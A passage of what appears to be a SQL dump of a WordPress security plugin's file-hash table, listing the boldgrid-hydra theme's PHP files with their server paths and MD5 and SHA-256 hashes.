hp',0,0x37FB227BD8ADAD0C0504393C58353ED4,0x37FB227BD8ADAD0C0504393C58353ED4,0x7D14F15B5CD6E812C1FE38FC864E86BE8CD906789C03F04FF91DEC40A6F44174,'',0,'?'),(0x843EBCF0AEF5A824B175ADE300F64089,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-pagination.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-pagination.php',0,0xEC48EB60F7667331875994D735EDED3D,0xEC48EB60F7667331875994D735EDED3D,0x1E18F6DEA2F72D7FC9432D97B1DBC517E52E4AAC464CF6F9588BDCAF76264C1D,'',0,'?'),(0x1ECD9CFE85B7F288DED6E60947E2581B,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-pointer.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-pointer.php',0,0xAED0F1C0679014B67F3833296EA1E360,0xAED0F1C0679014B67F3833296EA1E360,0x3DF5B5E24CE0B8AB0DDD8FE082CB3EDFC415757BCB833CE84E5F35F411EFEC8B,'',0,'?'),(0x8620FDB47C1BB08B971F15971A34A949,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-schema-markup.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-schema-markup.php',0,0x085B937A2131AAF8AFC731775A8E5380,0x085B937A2131AAF8AFC731775A8E5380,0xB51C5CF8F4FCFD7ABA6261FFB323B0415AFD71AA3F595095534997AF90F15A8F,'',0,'?'),(0x23CFE6502E91033C89A248C1A14926FF,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scripts.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scripts.php',0,0x9B4470C8A1ED4346368BF6ED6D7862DA,0x9B4470C8A1ED4346368BF6ED6D7862DA,0x2D6AD8023270D13D807196094E6BDC6D0596AECD9132F9AAA0666DDAB384A4C2,'',0,'?'),(0x538642E075EE9BC36E2DB66A4D94EE08,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scss-compile.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scss-compile.php',0,0xFD356B7F931C06FA192F05A8427007C0,0xFD356B7F931C06FA192F05A8427007C0,0x462E0119F9DAA290C6B51887EC25CBD843B85720B4F58F87E6FEE30E4F6052C6,'',0,'?'),(0x9D3DAAE79F7F0DF0BB06B28196822B8A,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scss.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-scss.php',0,0x4873E4ECF5C8E53D55D7822166F8A697,0x4873E4ECF5C8E53D55D7822166F8A697,0x7A2CFA4678B00EA9D0A949D2DD3E128358A54CBA30142A4DB2469624700EEA8B,'',0,'?'),(0xD813E32A9DDE0D1880F1E0B98C3546D2,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-search-forms.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-search-forms.php',0,0x3A1DBB10605325B2BFE2D0D0F559E4D7,0x3A1DBB10605325B2BFE2D0D0F559E4D7,0x20F05D8FB6B9DD5F0DE1FBFF8096EDA5CD1FF353AFF0BB32966FB6829F56CE0C,'',0,'?'),(0x12CF14668B9F4955C2579DE805C22039,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-setup.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-setup.php',0,0x7FEBDD7BBEFF1DCD88214844C8D8945A,0x7FEBDD7BBEFF1DCD88214844C8D8945A,0x27D9F01AA6D7797B282C9A52610C726405F052BAD69EB6D0257FCEBFD55EA04B,'',0,'?'),(0x5A9895082E96F30F61B61C2D1CB161BB,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-social-media-icons.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-social-media-icons.php',0,0x29844B7FF0F01505473D9FCCF4D82422,0x29844B7FF0F01505473D9FCCF4D82422,0x00FBB344CF2C1DCB2979E3082252151435A3BFF1ECBA2523B42B6D9E7E7169D1,'',0,'?'),(0x9F15D2F0B233DD9C26AAAF10B13B9190,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-staging.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-staging.php',0,0xE8DCAF2CBC9FD9F31DFD5E1E89E58797,0xE8DCAF2CBC9FD9F31DFD5E1E89E58797,0x02EA4896B932AF915A8E29519DE7BB20C671FD33F7F47B61DDED87FF57B8508F,'',0,'?'),(0x76FC82D1AFC8DBDC3611500ADF691E63,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-styles.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-styles.php',0,0x294CACBE315D48D68A3F9C9AD60B2E40,0x294CACBE315D48D68A3F9C9AD60B2E40,0x3AF0F887D56D06D192FD3042A35778B8670406ACA315DC3C13D1249A622C22BD,'',0,'?'),(0x51E930E0138E961ACF8668154141013C,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-template-config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-template-config.php',0,0x8A33CBB3B7DB7CBB288114C766A815C4,0x8A33CBB3B7DB7CBB288114C766A815C4,0x9E1D5DBB9427C9D29A86F3C4449056DA0F2267C8B8043A72769F5E5B4BC93D99,'',0,'?'),(0xF6B79F7524E39798610A718250C206A7,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-upgrade.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-upgrade.php',0,0x73E1691B954D92BDB22DDE3CD229A508,0x73E1691B954D92BDB22DDE3CD229A508,0xC02C33915BB2C9CAB5756301C2F07DC28EE394AEF6608CD13F2C891FC747ED27,'',0,'?'),(0xCC236316558F3388B5EF61AC70D5A3A3,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-widgets.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-widgets.php',0,0x7C227D02ED9266FABA10B840EFBED3EA,0x7C227D02ED9266FABA10B840EFBED3EA,0x93B8618135A97CF32739DA82E823A2BDE8CC65D319BF7D4D20CC04C094D764AD,'',0,'?'),(0x92D6BEBD2233EA943B0FBF45E3A2A824,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-woocommerce.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-woocommerce.php',0,0x27724A70BD753963BB634287525BBE06,0x27724A70BD753963BB634287525BBE06,0xB7C00867A64669D033DEFFA4536A71146BD97AAC790108405C104B00C0F8E198,'',0,'?'),(0x509F41136E704B0F96D69C8BB1A603B6,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-wp-fs.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-wp-fs.php',0,0xE2D150F6A19AC687643F7AFF5DFE6456,0xE2D150F6A19AC687643F7AFF5DFE6456,0x9031637E553DE4C3D3017DDD4FC9BDFFD16EDA04FEE189507BF37008615197F8,'',0,'?'),(0x551085CC29B60EEDCB1B4A59FA473772,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-wrapper.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework-wrapper.php',0,0xAE2954E220EE34177A8E9A81DC823EC3,0xAE2954E220EE34177A8E9A81DC823EC3,0xAFFC163EE6088D95816B8CC702FE4C8265D74F29FC832047D28A424F9A033496,'',0,'?'),(0xBCC4F6E5096A68823BA15742B45457F6,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/class-boldgrid-framework.php',0,0xCB2B8C9B1BF96B05E0108568EF63DA2B,0xCB2B8C9B1BF96B05E0108568EF63DA2B,0x44277DB996F08815B5E9817CD59A6C47D25497D2F06FC2A0D96D72077786E816,'',0,'?'),(0x2A915930E1C6BB47A330F8F0F27A8AA3,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/action.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/action.config.php',0,0xC7254DEEF45761864ABF5A75ECC46133,0xC7254DEEF45761864ABF5A75ECC46133,0xB046F672A819CB0796ED7C42216E79F90E5444A5F3470C5C7E7A1BA601A092EF,'',0,'?'),(0xEF18F7629876E2F8666316E7A5A032E5,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/category.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/category.config.php',0,0xE484DBB7951B1431B21FDC312C48C323,0xE484DBB7951B1431B21FDC312C48C323,0xB3970D6CB7FFFCB878CA790B049329CF2BA8BF5B50F83837A23EBDC0A76F2BAE,'',0,'?'),(0x69E3E78D213F905B81DBFE9EA483CDDD,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/components/bootstrap.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/components/bootstrap.config.php',0,0x6C2080F6AB61D0D96387FAB78C4A1156,0x6C2080F6AB61D0D96387FAB78C4A1156,0xF3D82E5E9DB2898D64E9FF96FA4D182C996799854A1561572EF0A03A4FEA1AB2,'',0,'?'),(0xB0B84C1B9B2ACAE2903C85EEF2754EAE,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/components/buttons.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/components/buttons.config.php',0,0x51C67C04DA95884F624B92964CDEF410,0x51C67C04DA95884F624B92964CDEF410,0xDC66873C2CEE23C2A486B95D90D4E9471A6266EE8F77186F02462661B29A217D,'',0,'?'),(0x184BE334F0EB8EDE0FB8B06D45A3FA98,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/configs.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/configs.php',0,0x1E1A7387C636663CAA7D4345AD88D3C6,0x1E1A7387C636663CAA7D4345AD88D3C6,0xC59E94F502FDD996451C1749B3300CFA7D94FCF587C49EA580EFC458B3BDBBE1,'',0,'?'),(0xF160D34ECDF2ED31126CF25EA81ECD9E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/background.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/background.config.php',0,0xB07AC252FB0E180C7C6EE242BB2F95CA,0xB07AC252FB0E180C7C6EE242BB2F95CA,0x6DF3B44EE847927FF2777CCD37F909AE3997FF8D4F56348C36E95AA1EE2D7F9D,'',0,'?'),(0x9149FA30AEDACDA663E0FF67B1B38E8E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/colors.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/colors.config.php',0,0x7FF346BEC4AFDB21283739D7DDA8782F,0x7FF346BEC4AFDB21283739D7DDA8782F,0xADA05B8828A8F28DBDFE7ABD4DCC300CF7DA67FABC6FD3A14C947FADA22E3B9D,'',0,'?'),(0x18E97CC43F822B220CA802A3910BA88E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/contact-blocks.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/contact-blocks.config.php',0,0xBCEB0B6DF3967E166D6D4FC5504F8A95,0xBCEB0B6DF3967E166D6D4FC5504F8A95,0x4E20A30C1063A5D416B2A99B9AF5426D3304736DF3BC45AFB0E31C54370165D1,'',0,'?'),(0x84C52D5B91CF264EC3C8784D6D746190,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/edit.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/edit.config.php',0,0xB7AF9E55BDFD924382760B9F3CD31D73,0xB7AF9E55BDFD924382760B9F3CD31D73,0x7BE2F43C0C4D1858E18C5A5345EADBD25942BD4D0243CD8F4E48D1CD680F9449,'',0,'?'),(0xBF63B725534427FC9DD4BC7EEFE2C245,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/header-image.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/header-image.config.php',0,0x7B26451970A962892DA47B44F1A37B2D,0x7B26451970A962892DA47B44F1A37B2D,0x72224B82054BA6C167EBFBBB45224837D1054C7804F445E03BDD33FBF430CBFD,'',0,'?'),(0x31E9E5D1C6BBDEA088C74EADE1413C97,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/required.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/required.config.php',0,0x13BC0B174A4761ADB03BA5BC2A0ECCBD,0x13BC0B174A4761ADB03BA5BC2A0ECCBD,0xD1675D9131EACBEBE34E8424B382F225EEB04273F459739CD3F0BDFFD9F540DC,'',0,'?'),(0x303AE933A69D901FFAF014B1C0C194C2,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/site-title.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/site-title.config.php',0,0x7555C8312DFE32C1434A58EB2C6C4A05,0x7555C8312DFE32C1434A58EB2C6C4A05,0xCBD4FEF98B537E155F8BCB147777E94FF5BDE557ED43C4B6F8BA1B5F0908F647,'',0,'?'),(0x88E20C0A8F3B937CEEDB4761F5D866AA,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/typography.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/customizer-options/typography.config.php',0,0x0DC47B81FDEFAEADE9FD3469DE1E908B,0x0DC47B81FDEFAEADE9FD3469DE1E908B,0x0EC3026A02915FD3C64155DDCA6D720DF9072B815F655FAC583DCA8BA251C8DD,'',0,'?'),(0x9DA5F9255F787D70E6E69D46D11ECD5D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/edit-post-links.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/edit-post-links.config.php',0,0x6DCBFA9C3FB1B7B1EEBA3C34180947D3,0x6DCBFA9C3FB1B7B1EEBA3C34180947D3,0xBAAD7D4815A9484D69C3236C10844EABFD732A8B29C65A79AA4B18D5C94D6168,'',0,'?'),(0x3922A9C57B68A9ABD8FA3E4EF6FEF5D5,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/menu.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/menu.config.php',0,0x5AA0EFEFBDBC9B1A3A7F357E2EEF3A27,0x5AA0EFEFBDBC9B1A3A7F357E2EEF3A27,0x88D6CA155D68E33D8CD4D19E688A1AACCCFA278FBCDC2908995640F3098D3CA4,'',0,'?'),(0x1F5B020AFF5EB45B37FF3D93DCDABE50,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/scripts.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/scripts.config.php',0,0xFDD1CDA6E64F6B8001A4B0527C655E34,0xFDD1CDA6E64F6B8001A4B0527C655E34,0x88C2005E5D1BB37FA7287503E71E3AA2B1B0B80339E1E640D8E970589D3419FD,'',0,'?'),(0x0DEF987197032074FE9AF5D0F4E05999,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/social-icons.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/social-icons.config.php',0,0x3830F53D380764F41F2E32753FE38F77,0x3830F53D380764F41F2E32753FE38F77,0xFA32AB4596890FE2058AFA533873CA4A9A3A2082C7DF21233C0C1CE67681B2BC,'',0,'?'),(0xF709F008B478254864AC0EE5DBD06F1B,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/styles.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/styles.config.php',0,0x8E32300D0EBC7BF8AA14BA8A719755A2,0x8E32300D0EBC7BF8AA14BA8A719755A2,0x49602F5A3AB53272E36B744A63FCD577104BEEC491182928C08BB2E68FAFB9C2,'',0,'?'),(0xCA9EA95844A94979E9DC541911B79DB4,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/supported-features.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/supported-features.config.php',0,0x71AB1444BE77B2089C1088CF53DDED2A,0x71AB1444BE77B2089C1088CF53DDED2A,0xC2CF0A856ACF1CA21F518135893023C49563E545926A34A34396FE0D814548E9,'',0,'?'),(0x66C1F4FDB134AAE10B6ACA0A85130CE9,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/template.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/template.config.php',0,0xF2BBFAA048829F71122A96D3AEED4DED,0xF2BBFAA048829F71122A96D3AEED4DED,0x4AF68CB651B392D5EB225A74EBFDB280F014A0805B00782A4777DE8B424DD36D,'',0,'?'),(0x181AE11B9598C414F1A680A15C3E7CE7,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/tgm.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/tgm.config.php',0,0x7DEAF51B96D561574463E1FF944E60C8,0x7DEAF51B96D561574463E1FF944E60C8,0x55CFDC7108B05D37544973A5A9899BCFEFCEE1A2C7DD7AA0304714DE1631FCBF,'',0,'?'),(0xB3869CC3572E15F825A9C3BA7C378B94,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/tooltips.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/tooltips.config.php',0,0x2A4EFA95EF32195B19AE5357065C2C90,0x2A4EFA95EF32195B19AE5357065C2C90,0x569C1212C4CB1A699E4CCBD09F8FEADAF3F797DE25823F25C02D52BE1303EB62,'',0,'?'),(0x406CA87A5541D5F1614A60B2225D50A8,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/widget.config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/configs/widget.config.php',0,0x5EAC64FDC58541F6CE7931D22BE2A473,0x5EAC64FDC58541F6CE7931D22BE2A473,0xEA36A1446B43956B42F08BCED96B52A17DF425784DAE31783DC7740FCC9E4B9E,'',0,'?'),(0x4D6BF950A4E5FC1DA831FF00A009D8D1,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-background-crop.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-background-crop.php',0,0x7F6E153B3AD91DEAC00B74D304650A1D,0x7F6E153B3AD91DEAC00B74D304650A1D,0x9328B05B51AC38EB95262C23F39FCA2303AB713FE5FF8026F21ABDD96178E57A,'',0,'?'),(0x9F70ABEBB5CE8AD2846FCD3278B892F9,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-background-type.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-background-type.php',0,0x26119D6BA7459A0A67E651FC5F6BEC68,0x26119D6BA7459A0A67E651FC5F6BEC68,0x45332B5EE738E0FC77A9576286FABAC6034FCB2DCE0C6D6E28D25B3EFFC2F060,'',0,'?'),(0x501D2329A477258048B312903D918737,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-palette.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-palette.php',0,0x2880E6E108E3CEDE0688F01CD5FD81BA,0x2880E6E108E3CEDE0688F01CD5FD81BA,0x60281DF00EDFEA38233A77DB6A2C9356CF7D7B2F246BA00C2C02B1FC6D3A3D82,'',0,'?'),(0xB79421F0FB2DE4AF9690DC91AC66A7C3,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-pattern.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/class-boldgrid-framework-control-pattern.php',0,0x95D41F2A70B227953BFD0CEDAD1AF0D7,0x95D41F2A70B227953BFD0CEDAD1AF0D7,0x7291AF5DEDBEF10ED4AD7E5287F2F8AECD6A58116A75D7DB6279D4F13BBC2791,'',0,'?'),(0x7EE09761B2C7618FE8293CA5E09251DE,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/index.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/control/index.php',0,0x0BC5B3478EC8BCFCA045A01ED9DA12CE,0x0BC5B3478EC8BCFCA045A01ED9DA12CE,0xDE11E15201CCB74C2535BF381E53F72DBD8377268A7F3FC735954F747B4D7D55,'',0,'?'),(0x5BBEE19EA664136B5866D52F2EAE4304,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-background.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-background.php',0,0x058320C0D69DD202CACA45B7C967D0A1,0x058320C0D69DD202CACA45B7C967D0A1,0x74F4E789FC43A42AA2AB266A64F3AC1DDACB0EE45CD8427092D86E6935F6B279,'',0,'?'),(0x612927EDFBE5CAAC0E6D5A6F15A93E0C,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-colors.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-colors.php',0,0xF0C384AAF7387A60E9D3D4C5277250A9,0xF0C384AAF7387A60E9D3D4C5277250A9,0x93004E9B851987D0A80EEFB4644B9844B47136D6BABB6D3B6B3623E121010E3C,'',0,'?'),(0xA45D7DE0BB239B902FD230920CD77CC2,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-contact-blocks.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-contact-blocks.php',0,0x0214990D3AE0FA65A8DAD1953DFFA384,0x0214990D3AE0FA65A8DAD1953DFFA384,0x8415D6771D36F19A9512AAAFBFDD54EC3C020337337DF635FE33217DD83FA30C,'',0,'?'),(0xEAD0D02504A458B6919F6ED423E3142A,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-device-preview.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-device-preview.php',0,0x334528D4F082A1F2FB9E8425836801E9,0x334528D4F082A1F2FB9E8425836801E9,0xDF1C002ABDB564B62294B179FD432BAA0F1F7459693257E3E0B7753CEC05D09C,'',0,'?'),(0x9B832DB321379AE62B4B5F84C462192D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-edit.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-edit.php',0,0x02B2882709F985B604C631EB7DB6AC42,0x02B2882709F985B604C631EB7DB6AC42,0x778BC99B9B3495266108790AB128D31C169AD4A11ABEADA9801D03B43257610D,'',0,'?'),(0x8E4513841B5723E5445D48BB3497DE45,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-effects.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-effects.php',0,0x9CC0CE0B0ACBCDE3FC8CA1BEE2ED6757,0x9CC0CE0B0ACBCDE3FC8CA1BEE2ED6757,0x312F38EF8BE27AC9D74406C1942C0E1EBDFBEED0F6D905C98F966E35C323693A,'',0,'?'),(0x26F62CF0C687E3285279E9F9DECECC96,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-footer.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-footer.php',0,0x56B59B828B803D80109A1E68E3E308FA,0x56B59B828B803D80109A1E68E3E308FA,0x383C150E0407928F9622FEB8E9E2E91F91DDE6254BB47AEA455601CC3BFD3EA9,'',0,'?'),(0x0BF02036560580A8F9B98247FE3A5994,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-help.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-help.php',0,0x6DEC3041B002EE6DD61B023A065EFF36,0x6DEC3041B002EE6DD61B023A065EFF36,0xAEADF4AE506F268B8702E8A958F681A0F53A55DB706FBAC3247B72F307A8E5D1,'',0,'?'),(0xF6C6B00DAABED80E74F76C41351B202C,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-kirki.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-kirki.php',0,0x488A3A59F211A506151686397A923D41,0x488A3A59F211A506151686397A923D41,0x78295FB057D2757DC54B0FDDED5B8CA244577BA57CBCCF7C5FBB55FB053D8D8C,'',0,'?'),(0x3B3710F15B82A81A22E04C01B9584074,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-typography.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer-typography.php',0,0x5A601F4B289795B188579B901A88D399,0x5A601F4B289795B188579B901A88D399,0x382FC48B95DD3B2F23BB82CD4017AB94CF6220F5FF3BF1A9C8DF96423B0CFEB2,'',0,'?'),(0xDB972F9F3B59D187DEB63D3CEF696C59,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/class-boldgrid-framework-customizer.php',0,0x8C526FF86924AAE0F60FE9BC66C2BC23,0x8C526FF86924AAE0F60FE9BC66C2BC23,0x3DB666C371AC7B122EA6D2F25966C37A71773AC21C79F6F263FCC799EDD60457,'',0,'?'),(0xA87CBBCCDB791589188E404515013319,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/index.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/customizer/index.php',0,0x0BC5B3478EC8BCFCA045A01ED9DA12CE,0x0BC5B3478EC8BCFCA045A01ED9DA12CE,0xDE11E15201CCB74C2535BF381E53F72DBD8377268A7F3FC735954F747B4D7D55,'',0,'?'),(0x54154FEF06BB22FBAA94D485E1597828,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/index.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/index.php',0,0x0BC5B3478EC8BCFCA045A01ED9DA12CE,0x0BC5B3478EC8BCFCA045A01ED9DA12CE,0xDE11E15201CCB74C2535BF381E53F72DBD8